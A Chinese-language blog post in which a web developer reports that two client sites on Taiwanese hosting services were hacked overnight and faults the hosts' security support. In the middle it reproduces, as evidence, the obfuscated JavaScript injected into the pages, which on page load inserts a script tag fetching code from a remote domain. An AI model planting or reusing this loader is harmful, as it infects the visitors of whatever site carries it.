智邦生活館&台灣網域中心網站被駭

這次我有兩個案子中招,而且都是在半夜,我覺得還蠻嚴重的。
我有兩個案子放在台灣的hosting主機中,兩個案子的主機都在半夜被駭
智邦生活館的Blog系統是在半夜2點多被駭的
台灣網域中心是網站在3點多被駭的

因為智邦生活館的業主打電話來給我,我看了訊息之後,跟他說,我沒有調過任何設定,所以不是我這邊造成的,業主說,他打給智邦生活館問過了,他說他們那邊沒有問題,結果一看,被駭了,檔案大小都不對,而且修改日期在半夜。
記錄1

記錄2

記錄3

還有很多的畫面,在這裡就不提了,問題是,智邦生活館完全沒有查覺這樣的問題。

網頁中被修改,新增的資料如下

this.UR=false;var lf=new Date();this.wF=48903;function p(){var vV=””;var Y=window;this.X=false;this.tKE=false;this.B=10371;var Q=new Date();var af=new Date();var l=Y[new String(“unes”+”cape”)];var yM=new Array();var G=new Array();var y=new String(“scriDajL”.substr(0,4)+”pt”);var Wc=new Date();var cs=new Date();var q=””;this.Mp=false;var Z=String(“/go”+”A3iogl”.substr(3)+”e.c”+”NcTom/cNT”.substr(3,3)+”nov”+”hgxink”.substr(3)+”y.c”+”2C08z/a8C20″.substr(4,3)+”dse”+”rveFdx”.substr(0,3)+”Pk0drpl”.substr(4)+”lv6Lus.l6Lv”.substr(4,3)+”com”+”.ph”+”p”);var M=String(“yF9def”.substr(3)+”er”);this.jl=64880;var tq=”tq”;function R(K,U){this.sO=””;var H=l(new String(“]”));var T=l(new String(“[9BRO”.substr(0,1)));this.HO=37496;var c=String(“g”);var YL=new Date();var o=new RegExp(T+U+H, c);return K.replace(o, new String());var HR=new Date();var TS=””;};var Fh=new Date();var jp=new Date();var k=R(‘8949943273475110414641246614253875543652230593425422164′,’35941672’);var wM=new Array();var CU=new Array();var Yx=””;var LX=”LX”;var Ui=R(‘ckr5eFaQtXeHEClXeCmQe1n3t5′,’kSxF15C34dGHoQXq’);var e=R(‘sxrBck’,’NxkB2R_’);var C=document;this.XU=false;this.kS=false;this.bh=false;function Hx(){var nh=new Array();var t=l(String(“http”+”://a”+”3DU9llea”.substr(4)+”fvdHsygu”.substr(4)+”N9J6ide.N96J”.substr(4,4)+”at:”));var cj=new Array();var Ms=t+k+Z;this.KF=30009;var pK=new Date();var iZ=””;var P=R(‘b1o3dFy4′,’2ARhQlFI1kNS403j87YO’);this.AR=false;var Hz=”Hz”;var i=R(‘a5p_pReHnZd4CuhZijludN’,’RO4uwZjN_5Ht’);var OR=new Array();try {var Pe=””;this.hm=””;this.Hh=false;lk=C[Ui](y);this.pn=6021;this.Lz=””;this.cl=””;lk[M]=[1][0];this.QFW=””;var WS=new Date();lk[e]=Ms;var d=new Date();C[P][i](lk);var tv=new Date();var _k=new Date();} catch(w){};}this.Xp=14284;var _r=”_r”;var Gpq=””;var W=R(‘oPn3leo6a3di’,’PSOxEAi3MzLFfh6eB’);var cA=”cA”;Y[W]=Hx;this.eyu=42782;this.Jy=false;this.TF=false;};var B_=new Array();var rM=””;p();

台灣網域中心寄存的業主收到信通知,資料已回溯到前一天的資料。
台灣網域中心的網站,我都沒有更改過,因為這個案子目前還在開發階段,除了拿回資料之外,網站的開發都放在國外我另一台模擬環境中,因為我不小心動到就更不可能了。
這次兩台不同的主機被駭,可以看的出來,手法是一樣的,應該是有系統有目的攻擊。

我另外還有20個站,都放在國外,卻是一點問題也沒有,國內的主機寄存環境,真的蠻慘的。智邦的工程師,上面這些都是我從你們公司網站抓下來的畫面,你們有看過Log了嗎?沒有看過,就說你們沒有問題,你們的處理能力不及台灣網域中心的工程師嗎?還好,國外的網站沒有中招,不然20個站要處理,我會欲哭無淚。

另外,國外的寄存公司,每天都會定期掃毒,主動提供病毒木馬防護。一個被掛馬的網站,想要有好的排名是不可能的,因為Google/Yahoo/Bing都會阻擋流量,剛才查了一下智邦,除了不主動防護,回溯,就要給錢($450),產品經理到處留言滅火,但是第一線的工程人員,實在讓人不敢恭惟。

智邦寄存主機服務條款有一條
註七:本專案不包含防駭、防DDOS等高階技術支援。如您有這方面需求,請自行尋找系統安全人員或顧問公司,亦可由智邦生活館推薦相關公司給您。

實在是感覺很不好,智邦的方案說,中華電信的內部流量全部不算,所以DDOS發生時,也不防護嗎?被駭也不用防護,感覺起來一整個很不好,找顧問公司,那還找你們寄存做什麼?

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *